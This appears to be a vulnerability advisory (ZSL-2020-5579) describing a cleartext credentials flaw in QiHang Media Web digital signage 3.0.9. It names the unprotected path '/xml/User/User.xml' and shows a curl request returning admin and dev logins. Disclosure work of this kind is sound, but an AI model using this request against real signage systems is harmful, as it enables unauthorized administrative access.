QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure  
Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd.  
Guangzhou Hefeng Automation Technology Co., Ltd.  
Product web page:  
Affected version:  
Summary: Digital Signage Software.  
Desc: The application suffers from clear-text credentials disclosure vulnerability  
that allows an unauthenticated attacker to issue a request to an unprotected directory  
that hosts an XML file '/xml/User/User.xml' and obtain administrative login information  
that allows for a successful authentication bypass attack.  
Tested on: Microsoft Windows Server 2012 R2 Datacenter  
Microsoft Windows Server 2003 Enterprise Edition  
ASP.NET 4.0.30319  
HowFor Web Server/  
Microsoft ASP.NET Web QiHang IIS Server  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2020-5579  
Advisory URL:  
$ curl  
<?xml version="1.0" encoding="utf-8"?>  
<User id="1" account="admin" password="admin" />  
<User id="2" account="dev" password="dev" />